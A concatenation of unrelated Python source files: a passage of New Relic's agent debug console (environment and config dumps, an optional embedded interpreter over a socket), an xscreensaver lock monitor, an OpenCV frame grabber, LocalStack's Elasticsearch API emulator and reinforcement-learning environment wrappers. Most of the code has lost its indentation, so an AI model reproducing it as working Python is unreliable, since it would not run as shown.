@shell_command
def do_exit(self):
"""
Exit the console."""
return True
@shell_command
def do_process_id(self):
"""
Displays the process ID of the process."""
print(os.getpid(), file=self.stdout)
@shell_command
def do_sys_prefix(self):
"""
Displays the value of sys.prefix."""
print(sys.prefix, file=self.stdout)
@shell_command
def do_sys_path(self):
"""
Displays the value of sys.path."""
print(sys.path, file=self.stdout)
@shell_command
def do_sys_modules(self):
"""
Displays the list of Python modules loaded."""
for name, module in sorted(sys.modules.items()):
if module is not None:
file = getattr(module, '__file__', None)
print("%s - %s" % (name, file), file=self.stdout)
@shell_command
def do_sys_meta_path(self):
"""
Displays the value of sys.meta_path."""
print(sys.meta_path, file=self.stdout)
@shell_command
def do_os_environ(self):
"""
Displays the set of user environment variables."""
for key, name in os.environ.items():
print("%s = %r" % (key, name), file=self.stdout)
@shell_command
def do_current_time(self):
"""
Displays the current time."""
print(time.asctime(), file=self.stdout)
@shell_command
def do_config_args(self):
"""
Displays the configure arguments used to build Python."""
args = ''
try:
# This may fail if using package Python and the
# developer package for Python isn't also installed.
import distutils.sysconfig
args = distutils.sysconfig.get_config_var('CONFIG_ARGS')
except Exception:
pass
print(args, file=self.stdout)
@shell_command
def do_dump_config(self, name=None):
"""
Displays global configuration or that of the named application.
"""
if name is None:
config = agent_instance().global_settings()
else:
config = agent_instance().application_settings(name)
if config is not None:
config = flatten_settings(config)
keys = sorted(config.keys())
for key in keys:
print('%s = %r' % (key, config[key]), file=self.stdout)
@shell_command
def do_agent_status(self):
"""
Displays general status information about the agent, registered
applications, harvest cycles etc.
"""
agent_instance().dump(self.stdout)
@shell_command
def do_applications(self):
"""
Displays a list of the applications.
"""
print(repr(sorted(
agent_instance().applications.keys())), file=self.stdout)
@shell_command
def do_application_status(self, name=None):
"""
Displays general status information about an application, last
harvest cycle, etc.
"""
if name is not None:
applications = [agent_instance().application(name)]
else:
applications = agent_instance().applications.values()
for application in applications:
if application is not None:
application.dump(self.stdout)
print(file=self.stdout)
@shell_command
def do_import_hooks(self):
"""
Displays list of registered import hooks, which have fired and
which encountered errors.
"""
from newrelic.config import module_import_hook_results
results = module_import_hook_results()
for key in sorted(results.keys()):
result = results[key]
if result is None:
if key[0] not in sys.modules:
print('%s: PENDING' % (key,), file=self.stdout)
else:
print('%s: IMPORTED' % (key,), file=self.stdout)
elif not result:
print('%s: INSTRUMENTED' % (key,), file=self.stdout)
else:
print('%s: FAILED' % (key,), file=self.stdout)
for line in result:
print(line, end='', file=self.stdout)
@shell_command
def do_transactions(self):
"""
"""
for item in _trace_cache.active_threads():
transaction, thread_id, thread_type, frame = item
print('THREAD', item, file=self.stdout)
if transaction is not None:
transaction.dump(self.stdout)
print(file=self.stdout)
@shell_command
def do_interpreter(self):
"""
        When enabled in the configuration file, will start up an embedded
interactive Python interpreter. Invoke 'exit()' or 'quit()' to
escape the interpreter session."""
enabled = False
_settings = global_settings()
if not _settings.console.allow_interpreter_cmd:
print('Sorry, the embedded Python ' \
'interpreter is disabled.', file=self.stdout)
return
locals = {}
locals['stdin'] = self.stdin
locals['stdout'] = self.stdout
console = EmbeddedConsole(locals)
console.stdin = self.stdin
console.stdout = self.stdout
acquire_console(self)
try:
console.interact()
except SystemExit:
pass
finally:
release_console()
@shell_command
def do_threads(self):
"""
Display stack trace dumps for all threads currently executing
within the Python interpreter.
Note that if coroutines are being used, such as systems based
on greenlets, then only the thread stack of the currently
executing coroutine will be displayed."""
all = []
for threadId, stack in sys._current_frames().items():
block = []
block.append('# ThreadID: %s' % threadId)
thr = threading._active.get(threadId)
if thr:
block.append('# Type: %s' % type(thr).__name__)
block.append('# Name: %s' % thr.name)
for filename, lineno, name, line in traceback.extract_stack(
stack):
block.append('File: \'%s\', line %d, in %s' % (filename,
lineno, name))
if line:
block.append(' %s' % (line.strip()))
all.append('\n'.join(block))
print('\n\n'.join(all), file=self.stdout)
class ConnectionManager(object):
def __init__(self, listener_socket):
self.__listener_socket = listener_socket
self.__console_initialized = False
if not os.path.isabs(self.__listener_socket):
host, port = self.__listener_socket.split(':')
port = int(port)
self.__listener_socket = (host, port)
self.__thread = threading.Thread(target=self.__thread_run,
name='NR-Console-Manager')
self.__thread.setDaemon(True)
self.__thread.start()
def __socket_cleanup(self, path):
try:
os.unlink(path)
except Exception:
pass
def __thread_run(self):
if type(self.__listener_socket) == type(()):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(self.__listener_socket)
else:
try:
os.unlink(self.__listener_socket)
except Exception:
pass
listener = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
listener.bind(self.__listener_socket)
atexit.register(self.__socket_cleanup, self.__listener_socket)
os.chmod(self.__listener_socket, 0o600)
listener.listen(5)
while True:
client, addr = listener.accept()
if not self.__console_initialized:
self.__console_initialized = True
intercept_console()
shell = ConsoleShell()
shell.stdin = client.makefile('r')
shell.stdout = client.makefile('w')
while True:
try:
shell.cmdloop()
except Exception:
shell.stdout.flush()
print('Unexpected exception.', file=shell.stdout)
exc_info = sys.exc_info()
traceback.print_exception(exc_info[0], exc_info[1],
exc_info[2], file=shell.stdout)
exc_info = None
else:
break
shell.stdin = None
shell.stdout = None
del shell
client.close()
class ClientShell(cmd.Cmd):
prompt = '(newrelic) '
def __init__(self, config_file, stdin=None, stdout=None, log=None):
cmd.Cmd.__init__(self, stdin=stdin, stdout=stdout)
self.__config_file = config_file
self.__config_object = ConfigParser.RawConfigParser()
self.__log_object = log
if not self.__config_object.read([config_file]):
raise RuntimeError('Unable to open configuration file %s.' %
config_file)
listener_socket = self.__config_object.get('newrelic',
'console.listener_socket') % {'pid': '*'}
if os.path.isabs(listener_socket):
self.__servers = [(socket.AF_UNIX, path) for path in
sorted(glob.glob(listener_socket))]
else:
host, port = listener_socket.split(':')
port = int(port)
self.__servers = [(socket.AF_INET, (host, port))]
def emptyline(self):
pass
def help_help(self):
print("""help (command)
Output list of commands or help details for named command.""",
file=self.stdout)
def do_exit(self, line):
"""exit
Exit the client shell."""
return True
def do_servers(self, line):
"""servers
Display a list of the servers which can be connected to."""
for i in range(len(self.__servers)):
print('%s: %s' % (i+1, self.__servers[i]), file=self.stdout)
def do_connect(self, line):
"""connect [index]
        Connect to the server from the servers list with given index. If
there is only one server then the index position does not need to
be supplied."""
if len(self.__servers) == 0:
print('No servers to connect to.', file=self.stdout)
return
if not line:
if len(self.__servers) != 1:
print('Multiple servers, which should be used?',
file=self.stdout)
return
else:
line = '1'
try:
selection = int(line)
except Exception:
selection = None
if selection is None:
print('Server selection not an integer.', file=self.stdout)
return
if selection <= 0 or selection > len(self.__servers):
print('Invalid server selected.', file=self.stdout)
return
server = self.__servers[selection-1]
client = socket.socket(server[0], socket.SOCK_STREAM)
client.connect(server[1])
def write():
while 1:
try:
c = sys.stdin.read(1)
if not c:
client.shutdown(socket.SHUT_RD)
break
if self.__log_object:
self.__log_object.write(c)
client.sendall(c.encode('utf-8'))
except Exception:
break
def read():
while 1:
try:
c = client.recv(1).decode('utf-8')
if not c:
break
if self.__log_object:
self.__log_object.write(c)
sys.stdout.write(c)
sys.stdout.flush()
except Exception:
break
thread1 = threading.Thread(target=write)
thread1.setDaemon(True)
thread2 = threading.Thread(target=read)
thread2.setDaemon(True)
thread1.start()
thread2.start()
thread2.join()
return True
def main():
if len(sys.argv) == 1:
print("Usage: newrelic-console config_file")
sys.exit(1)
shell = ClientShell(sys.argv[1])
shell.cmdloop()
if __name__ == '__main__':
main()
|
LockMonitor.py
|
# Copyright (c) 2012, Jeff Melville
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import subprocess
import threading
class LockMonitor:
def __init__(self, dispatcher, parent=None):
self.screen_locked = False
self.monitoring = False
self.dispatcher = dispatcher
#self.dispatcher.update_locked(self.get_status(), initial=True)
self.dispatcher.update_locked(False)
self.proc = None
self.running = False
def get_status(self):
return self.screen_locked
def monitor(self):
if self.proc: self.shutdown()
        # universal_newlines=True keeps stdout in text mode, so the '' sentinel
        # and the substring checks in run() work on both Python 2 and 3
        self.proc = subprocess.Popen("xscreensaver-command -watch", shell=True, stdout=subprocess.PIPE, universal_newlines=True)
self.proc_reader = threading.Thread(target=self.run)
self.running = True
self.proc_reader.start()
def shutdown(self):
#TODO: Not sure this will terminate correctly
if self.proc: self.proc.terminate()
self.running = False
self.proc = None
def run(self):
for line in iter(self.proc.stdout.readline,''):
if "UNBLANK" in line:
self.screen_locked = False
elif "LOCK" in line:
self.screen_locked = True
else:
continue
self.dispatcher.update_locked(self.screen_locked)
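# Example usage (an illustrative sketch, not part of the original module):
# LockMonitor only assumes a "dispatcher" object exposing update_locked(locked);
# the PrintDispatcher below is a hypothetical stand-in used for demonstration.
class PrintDispatcher:
    def update_locked(self, locked):
        print("screen locked:", locked)

if __name__ == "__main__":
    monitor = LockMonitor(PrintDispatcher())
    monitor.monitor()  # spawns the "xscreensaver-command -watch" reader thread
    try:
        monitor.proc_reader.join()
    except KeyboardInterrupt:
        monitor.shutdown()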
|
capture.py
|
from threading import Thread
import cv2
class VideoGet:
"""
Class that continuously gets frames from a VideoCapture object
with a dedicated thread.
"""
def __init__(self, src=0):
self.stream = cv2.VideoCapture(src,cv2.CAP_GSTREAMER)
(self.grabbed, self.frame) = self.stream.read()
self.stopped = False
def start(self):
Thread(target=self.get, args=()).start()
return self
def get(self):
while not self.stopped:
if not self.grabbed:
self.stop()
else:
(self.grabbed, self.frame) = self.stream.read()
def stop(self):
self.stopped = True
self.stream.release()
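# Example usage (an illustrative sketch, not part of the original module): grab
# frames from the background thread and display them until 'q' is pressed. The
# camera index 0 and the window name "preview" are assumptions for this demo.
if __name__ == "__main__":
    getter = VideoGet(0).start()
    while not getter.stopped:
        if getter.frame is not None:
            cv2.imshow("preview", getter.frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            getter.stop()
    cv2.destroyAllWindows()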
|
es_api.py
|
"""
Serve the elasticsearch API as a threaded Flask app.
"""
import json
import logging
import threading
import time
from random import randint
from typing import Dict, Optional
from flask import Flask, jsonify, make_response, request
from localstack import config, constants
from localstack.constants import TEST_AWS_ACCOUNT_ID
from localstack.services import generic_proxy
from localstack.services.es import versions
from localstack.services.es.cluster import ProxiedElasticsearchCluster
from localstack.services.generic_proxy import RegionBackend
from localstack.utils import persistence
from localstack.utils.analytics import event_publisher
from localstack.utils.aws import aws_stack
from localstack.utils.common import get_service_protocol, poll_condition, start_thread, to_str
from localstack.utils.tagging import TaggingService
LOG = logging.getLogger(__name__)
APP_NAME = "es_api"
API_PREFIX = "/2015-01-01"
DEFAULT_ES_VERSION = "7.10"
DEFAULT_ES_CLUSTER_CONFIG = {
"InstanceType": "m3.medium.elasticsearch",
"InstanceCount": 1,
"DedicatedMasterEnabled": True,
"ZoneAwarenessEnabled": False,
"DedicatedMasterType": "m3.medium.elasticsearch",
"DedicatedMasterCount": 1,
}
# timeout in seconds when giving up on waiting for the cluster to start
CLUSTER_STARTUP_TIMEOUT = 600
# ideally, each domain gets its own cluster. to save resources, we currently re-use the same
# cluster instance. this also means we lie to the client about the elasticsearch domain
# version. the first call to create_domain with a specific version will create the cluster
# with that version. subsequent calls will believe they created a cluster with the version
# they specified.
_cluster: Optional[ProxiedElasticsearchCluster] = None
# mutex for modifying domains
_domain_mutex = threading.Lock()
app = Flask(APP_NAME)
app.url_map.strict_slashes = False
class ElasticsearchServiceBackend(RegionBackend):
# maps cluster names to cluster details
es_clusters: Dict[str, ProxiedElasticsearchCluster]
# storage for domain resources (access should be protected with the _domain_mutex)
es_domains: Dict[str, Dict]
# static tagging service instance
TAGS = TaggingService()
def __init__(self):
self.es_clusters = {}
self.es_domains = {}
def _run_cluster_startup_monitor(cluster):
region = ElasticsearchServiceBackend.get()
LOG.debug("running cluster startup monitor for cluster %s", cluster)
# wait until the cluster is started, or the timeout is reached
status = poll_condition(cluster.is_up, timeout=CLUSTER_STARTUP_TIMEOUT, interval=5)
LOG.debug("cluster state polling returned! status = %s", status)
with _domain_mutex:
LOG.debug("iterating over cluster domains %s", region.es_clusters.keys())
for domain, domain_cluster in region.es_clusters.items():
LOG.debug("checking cluster for domain %s", domain)
if cluster is domain_cluster:
if domain in region.es_domains:
region.es_domains[domain]["Created"] = status
def _create_cluster(domain_name, data):
"""
    Create a new entry in ES_DOMAINS if the domain does not yet exist. Start an ElasticsearchCluster if this is the
    first domain being created. NOT thread safe; must be called while holding _domain_mutex.
"""
global _cluster
region = ElasticsearchServiceBackend.get()
if _cluster:
# see comment on _cluster
LOG.info("elasticsearch cluster already created, using existing one for %s", domain_name)
region.es_clusters[domain_name] = _cluster
data["Created"] = _cluster.is_up()
return
# creating cluster for the first time
version = versions.get_install_version(data.get("ElasticsearchVersion") or DEFAULT_ES_VERSION)
_cluster = ProxiedElasticsearchCluster(
port=config.PORT_ELASTICSEARCH, host=constants.LOCALHOST, version=version
)
def _start_async(*_):
LOG.info("starting %s on %s:%s", type(_cluster), _cluster.host, _cluster.port)
_cluster.start() # start may block during install
start_thread(_start_async)
region.es_clusters[domain_name] = _cluster
# run a background thread that will update all domains that use this cluster to set
# data['Created'] = <status> once it is started, or the CLUSTER_STARTUP_TIMEOUT is reached
# FIXME: if the cluster doesn't start, these threads will stay open until the timeout is
# reached, even if the cluster is already shut down. we could fix this with an additional
# event, or a timer instead of Poll, but it seems like a rare case in the first place.
threading.Thread(target=_run_cluster_startup_monitor, daemon=True, args=(_cluster,)).start()
def _cleanup_cluster(domain_name):
global _cluster
region = ElasticsearchServiceBackend.get()
cluster = region.es_clusters.pop(domain_name)
LOG.debug(
"cleanup cluster for domain %s, %d domains remaining", domain_name, len(region.es_clusters)
)
if not region.es_clusters:
# because cluster is currently always mapped to _cluster, we only shut it down if no other
# domains are using it
LOG.info("shutting down elasticsearch cluster after domain %s cleanup", domain_name)
cluster.shutdown()
# FIXME: if delete_domain() is called, then immediately after, create_domain() (without
# letting time pass for the proxy to shut down) there's a chance that there will be a bind
# exception when trying to start the proxy again (which is currently always bound to
# PORT_ELASTICSEARCH)
_cluster = None
def error_response(error_type, code=400, message="Unknown error."):
if not message:
if error_type == "ResourceNotFoundException":
message = "Resource not found."
elif error_type == "ResourceAlreadyExistsException":
message = "Resource already exists."
response = make_response(jsonify({"error": message}))
response.headers["x-amzn-errortype"] = error_type
return response, code
def get_domain_config_status():
return {
"CreationDate": "%.2f" % time.time(),
"PendingDeletion": False,
"State": "Active",
"UpdateDate": "%.2f" % time.time(),
"UpdateVersion": randint(1, 100),
}
def get_domain_config(domain_name):
region = ElasticsearchServiceBackend.get()
status = region.es_domains.get(domain_name) or {}
cluster_cfg = status.get("ElasticsearchClusterConfig") or {}
default_cfg = DEFAULT_ES_CLUSTER_CONFIG
config_status = get_domain_config_status()
return {
"DomainConfig": {
"AccessPolicies": {
"Options": '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::%s:root"},"Action":"es:*","Resource":"arn:aws:es:%s:%s:domain/%s/*"}]}'
% (
TEST_AWS_ACCOUNT_ID,
aws_stack.get_region(),
TEST_AWS_ACCOUNT_ID,
domain_name,
), # noqa: E501
"Status": config_status,
},
"AdvancedOptions": {
"Options": {
"indices.fielddata.cache.size": "",
"rest.action.multi.allow_explicit_index": "true",
},
"Status": config_status,
},
"EBSOptions": {
"Options": {
"EBSEnabled": True,
"EncryptionEnabled": False,
"Iops": 0,
"VolumeSize": 10,
"VolumeType": "gp2",
},
"Status": config_status,
},
"ElasticsearchClusterConfig": {
"Options": {
"DedicatedMasterCount": cluster_cfg.get(
"DedicatedMasterCount", default_cfg["DedicatedMasterCount"]
),
"DedicatedMasterEnabled": cluster_cfg.get(
"DedicatedMasterEnabled", default_cfg["DedicatedMasterEnabled"]
),
"DedicatedMasterType": cluster_cfg.get(
"DedicatedMasterType", default_cfg["DedicatedMasterType"]
),
"InstanceCount": cluster_cfg.get("InstanceCount", default_cfg["InstanceCount"]),
"InstanceType": cluster_cfg.get("InstanceType", default_cfg["InstanceType"]),
"ZoneAwarenessEnabled": cluster_cfg.get(
"ZoneAwarenessEnabled", default_cfg["ZoneAwarenessEnabled"]
),
},
"Status": config_status,
},
"CognitoOptions": {"Enabled": False},
"ElasticsearchVersion": {"Options": "5.3", "Status": config_status},
"EncryptionAtRestOptions": {
"Options": {"Enabled": False, "KmsKeyId": ""},
"Status": config_status,
},
"LogPublishingOptions": {
"Options": {
"INDEX_SLOW_LOGS": {
"CloudWatchLogsLogGroupArn": "arn:aws:logs:%s:%s:log-group:sample-domain"
% (aws_stack.get_region(), TEST_AWS_ACCOUNT_ID), # noqa: E501
"Enabled": False,
},
"SEARCH_SLOW_LOGS": {
"CloudWatchLogsLogGroupArn": "arn:aws:logs:%s:%s:log-group:sample-domain"
% (aws_stack.get_region(), TEST_AWS_ACCOUNT_ID), # noqa: E501
"Enabled": False,
},
},
"Status": config_status,
},
"SnapshotOptions": {
"Options": {"AutomatedSnapshotStartHour": randint(0, 23)},
"Status": config_status,
},
"VPCOptions": {
"Options": {
"AvailabilityZones": ["us-east-1b"],
"SecurityGroupIds": ["sg-12345678"],
"SubnetIds": ["subnet-12345678"],
"VPCId": "vpc-12345678",
},
"Status": config_status,
},
}
}
def get_domain_status(domain_name, deleted=False):
region = ElasticsearchServiceBackend.get()
status = region.es_domains.get(domain_name) or {}
cluster_cfg = status.get("ElasticsearchClusterConfig") or {}
default_cfg = DEFAULT_ES_CLUSTER_CONFIG
endpoint = "%s://%s:%s" % (
get_service_protocol(),
config.HOSTNAME_EXTERNAL,
config.PORT_ELASTICSEARCH,
)
return {
"DomainStatus": {
"ARN": "arn:aws:es:%s:%s:domain/%s"
% (aws_stack.get_region(), TEST_AWS_ACCOUNT_ID, domain_name),
"Created": status.get("Created", False),
"Deleted": deleted,
"DomainId": "%s/%s" % (TEST_AWS_ACCOUNT_ID, domain_name),
"DomainName": domain_name,
"ElasticsearchClusterConfig": {
"DedicatedMasterCount": cluster_cfg.get(
"DedicatedMasterCount", default_cfg["DedicatedMasterCount"]
),
"DedicatedMasterEnabled": cluster_cfg.get(
"DedicatedMasterEnabled", default_cfg["DedicatedMasterEnabled"]
),
"DedicatedMasterType": cluster_cfg.get(
"DedicatedMasterType", default_cfg["DedicatedMasterType"]
),
"InstanceCount": cluster_cfg.get("InstanceCount", default_cfg["InstanceCount"]),
"InstanceType": cluster_cfg.get("InstanceType", default_cfg["InstanceType"]),
"ZoneAwarenessEnabled": cluster_cfg.get(
"ZoneAwarenessEnabled", default_cfg["ZoneAwarenessEnabled"]
),
},
"ElasticsearchVersion": status.get("ElasticsearchVersion") or DEFAULT_ES_VERSION,
"Endpoint": endpoint,
"Processing": False,
"EBSOptions": {
"EBSEnabled": True,
"VolumeType": "gp2",
"VolumeSize": 10,
"Iops": 0,
},
"CognitoOptions": {"Enabled": False},
}
}
@app.route("%s/domain" % API_PREFIX, methods=["GET"])
def list_domain_names():
region = ElasticsearchServiceBackend.get()
result = {"DomainNames": [{"DomainName": name} for name in region.es_domains.keys()]}
return jsonify(result)
@app.route("%s/es/domain" % API_PREFIX, methods=["POST"])
def create_domain():
region = ElasticsearchServiceBackend.get()
data = json.loads(to_str(request.data))
domain_name = data["DomainName"]
with _domain_mutex:
if domain_name in region.es_domains:
# domain already created
return error_response(error_type="ResourceAlreadyExistsException")
# "create" domain data
region.es_domains[domain_name] = data
# lazy-init the cluster, and set the data["Created"] flag
_create_cluster(domain_name, data)
# create result document
result = get_domain_status(domain_name)
# record event
event_publisher.fire_event(
event_publisher.EVENT_ES_CREATE_DOMAIN,
payload={"n": event_publisher.get_hash(domain_name)},
)
persistence.record("es", request=request)
return jsonify(result)
@app.route("%s/es/domain/<domain_name>" % API_PREFIX, methods=["GET"])
def describe_domain(domain_name):
region = ElasticsearchServiceBackend.get()
with _domain_mutex:
if domain_name not in region.es_domains:
return error_response(error_type="ResourceNotFoundException")
result = get_domain_status(domain_name)
return jsonify(result)
@app.route("%s/es/domain-info" % API_PREFIX, methods=["POST"])
def describe_domains():
region = ElasticsearchServiceBackend.get()
data = json.loads(to_str(request.data))
result = []
domain_names = data.get("DomainNames", [])
with _domain_mutex:
for domain_name in region.es_domains:
if domain_name in domain_names:
status = get_domain_status(domain_name)
status = status.get("DomainStatus") or status
result.append(status)
result = {"DomainStatusList": result}
return jsonify(result)
@app.route("%s/es/domain/<domain_name>/config" % API_PREFIX, methods=["GET", "POST"])
def domain_config(domain_name):
with _domain_mutex:
doc = get_domain_config(domain_name)
return jsonify(doc)
@app.route("%s/es/domain/<domain_name>" % API_PREFIX, methods=["DELETE"])
def delete_domain(domain_name):
region = ElasticsearchServiceBackend.get()
with _domain_mutex:
if domain_name not in region.es_domains:
return error_response(error_type="ResourceNotFoundException")
result = get_domain_status(domain_name, deleted=True)
del region.es_domains[domain_name]
_cleanup_cluster(domain_name)
# record event
event_publisher.fire_event(
event_publisher.EVENT_ES_DELETE_DOMAIN,
payload={"n": event_publisher.get_hash(domain_name)},
)
persistence.record("es", request=request)
return jsonify(result)
@app.route("%s/es/versions" % API_PREFIX, methods=["GET"])
def list_es_versions():
result = []
for key in versions.install_versions.keys():
result.append(key)
return jsonify({"ElasticsearchVersions": result})
@app.route("%s/es/compatibleVersions" % API_PREFIX, methods=["GET"])
def get_compatible_versions():
result = [
{"SourceVersion": "7.10", "TargetVersions": []},
{"SourceVersion": "7.9", "TargetVersions": ["7.10"]},
{"SourceVersion": "7.8", "TargetVersions": ["7.9", "7.10"]},
{"SourceVersion": "7.7", "TargetVersions": ["7.8", "7.9", "7.10"]},
{"SourceVersion": "7.4", "TargetVersions": ["7.7", "7.8", "7.9", "7.10"]},
{"SourceVersion": "7.1", "TargetVersions": ["7.4", "7.7", "7.8", "7.9", "7.10"]},
{"SourceVersion": "6.8", "TargetVersions": ["7.1", "7.4", "7.7", "7.8", "7.9", "7.10"]},
{"SourceVersion": "6.7", "TargetVersions": ["6.8"]},
{"SourceVersion": "6.5", "TargetVersions": ["6.7", "6.8"]},
{"SourceVersion": "6.4", "TargetVersions": ["6.5", "6.7", "6.8"]},
{"SourceVersion": "6.3", "TargetVersions": ["6.4", "6.5", "6.7", "6.8"]},
{"SourceVersion": "6.2", "TargetVersions": ["6.3", "6.4", "6.5", "6.7", "6.8"]},
{"SourceVersion": "6.0", "TargetVersions": ["6.3", "6.4", "6.5", "6.7", "6.8"]},
{"SourceVersion": "5.6", "TargetVersions": ["6.3", "6.4", "6.5", "6.7", "6.8"]},
{"SourceVersion": "5.5", "TargetVersions": ["5.6"]},
{"SourceVersion": "5.3", "TargetVersions": ["5.6"]},
{"SourceVersion": "5.1", "TargetVersions": ["5.6"]},
]
return jsonify({"CompatibleElasticsearchVersions": result})
@app.route("%s/tags" % API_PREFIX, methods=["GET", "POST"])
def add_list_tags():
if request.method == "POST":
data = json.loads(to_str(request.data) or "{}")
arn = data.get("ARN")
ElasticsearchServiceBackend.TAGS.tag_resource(arn, data.get("TagList", []))
if request.method == "GET" and request.args.get("arn"):
arn = request.args.get("arn")
tags = ElasticsearchServiceBackend.TAGS.list_tags_for_resource(arn)
response = {"TagList": tags.get("Tags")}
return jsonify(response)
return jsonify({})
def serve(port, quiet=True):
generic_proxy.serve_flask_app(app=app, port=port)
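# Example (an illustrative sketch, not part of the service itself): the REST
# routes above can be exercised directly with Flask's test client, e.g. to list
# the Elasticsearch versions known to the installer and their upgrade paths.
if __name__ == "__main__":
    with app.test_client() as client:
        print(client.get(API_PREFIX + "/es/versions").get_json())
        print(client.get(API_PREFIX + "/es/compatibleVersions").get_json())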
|
env_wrappers.py
|
"""Env wrappers
Most common wrappers can be checked from following links for usage:
`https://pypi.org/project/gym-vec-env`
`https://github.com/openai/baselines/blob/master/baselines/common/*wrappers.py`
"""
from collections import deque
from functools import partial
from multiprocessing import Pipe, Process, cpu_count
from sys import platform
import numpy as np
import cv2
import gym
from gym import spaces
from gym.wrappers import FlattenDictWrapper
from env_list import get_envlist
__all__ = (
'build_env', # build env
'TimeLimit', # Time limit wrapper
'NoopResetEnv', # Run random number of no-ops on reset
'FireResetEnv', # Reset wrapper for envs with fire action
'EpisodicLifeEnv', # end-of-life == end-of-episode wrapper
'MaxAndSkipEnv', # skip frame wrapper
'ClipRewardEnv', # clip reward wrapper
'WarpFrame', # warp observation wrapper
'FrameStack', # stack frame wrapper
'LazyFrames', # lazy store wrapper
'RewardShaping', # reward shaping
'SubprocVecEnv', # vectorized env wrapper
'VecFrameStack', # stack frames in vectorized env
'Monitor', # Episode reward and length monitor
'NormalizedActions', # normalized action to actual space
'DmObsTrans', # translate observations in dm_control environments
)
cv2.ocl.setUseOpenCL(False)
def build_env(env_id, env_type, vectorized=False,
seed=0, reward_shaping=None, nenv=1, **kwargs):
"""Build env based on options
Args:
env_id (str): environment id
        env_type (str): one of atari, classic_control, box2d, mujoco,
            robotics, dm_control or rlbench
        vectorized (bool): whether to sample in parallel across subprocesses
seed (int): random seed for env
reward_shaping (callable): callable function for reward shaping
nenv (int): how many processes will be used in sampling
kwargs (dict):
max_episode_steps (int): the maximum episode steps
"""
nenv = nenv or cpu_count() // (1 + (platform == 'darwin'))
stack = env_type == 'atari'
if nenv > 1:
if vectorized:
env = _make_vec_env(env_id, env_type, nenv, seed,
reward_shaping, stack, **kwargs)
else:
env = []
for _ in range(nenv):
single_env = _make_env(env_id, env_type, seed,
reward_shaping, stack, **kwargs)
env.append(single_env) # get env as a list of same single env
else:
env = _make_env(env_id, env_type, seed,
reward_shaping, stack, **kwargs)
return env
def check_name_in_list(env_id, env_type):
""" Check if env_id exists in the env_type list """
env_list = get_envlist(env_type)
if env_id not in env_list:
print('Env ID {:s} Not Found In {:s}!'.format(env_id, env_type))
else:
print('Env ID {:s} Exists!'.format(env_id))
def _make_env(env_id, env_type, seed, reward_shaping, frame_stack, **kwargs):
"""Make single env"""
check_name_in_list(env_id, env_type) # check existence of env_id in env_type
if env_type == 'atari':
env = gym.make(env_id)
assert 'NoFrameskip' in env.spec.id
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
env = Monitor(env)
# deepmind wrap
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
elif env_type in ['classic_control', 'box2d', 'mujoco']:
env = gym.make(env_id).unwrapped
max_episode_steps = kwargs.get('max_episode_steps')
if max_episode_steps is not None:
env = TimeLimit(env.unwrapped, max_episode_steps)
env = Monitor(env)
elif env_type == 'robotics':
env = gym.make(env_id)
env = FlattenDictWrapper(env, ['observation', 'desired_goal'])
env = Monitor(env, info_keywords=('is_success',))
elif env_type == 'dm_control':
env = gym.make('dm2gym:' + env_id, environment_kwargs={'flat_observation': True})
env = DmObsTrans(env)
elif env_type == 'rlbench':
from common.build_rlbench_env import RLBenchEnv
env = RLBenchEnv(env_id)
else:
raise NotImplementedError
if reward_shaping is not None:
if callable(reward_shaping):
env = RewardShaping(env, reward_shaping)
else:
raise ValueError('reward_shaping parameter must be callable')
env.seed(seed)
return env
def _make_vec_env(env_id, env_type, nenv, seed,
reward_shaping, frame_stack, **kwargs):
"""Make vectorized env"""
env = SubprocVecEnv([partial(
_make_env, env_id, env_type, seed + i, reward_shaping, False, **kwargs
) for i in range(nenv)])
if frame_stack:
env = VecFrameStack(env, 4)
return env
class DmObsTrans(gym.Wrapper):
""" Observation process for DeepMind Control Suite environments """
def __init__(self, env):
self.env = env
super(DmObsTrans, self).__init__(env)
self.__need_trans = False
if isinstance(self.observation_space, gym.spaces.dict.Dict):
self.observation_space = self.observation_space['observations']
self.__need_trans = True
def step(self, ac):
observation, reward, done, info = self.env.step(ac)
if self.__need_trans:
observation = observation['observations']
return observation, reward, done, info
def reset(self, **kwargs):
observation = self.env.reset(**kwargs)
if self.__need_trans:
observation = observation['observations']
return observation
class TimeLimit(gym.Wrapper):
def __init__(self, env, max_episode_steps=None):
self.env = env
super(TimeLimit, self).__init__(env)
self._max_episode_steps = max_episode_steps
self._elapsed_steps = 0
def step(self, ac):
observation, reward, done, info = self.env.step(ac)
self._elapsed_steps += 1
if self._elapsed_steps >= self._max_episode_steps:
done = True
info['TimeLimit.truncated'] = True
return observation, reward, done, info
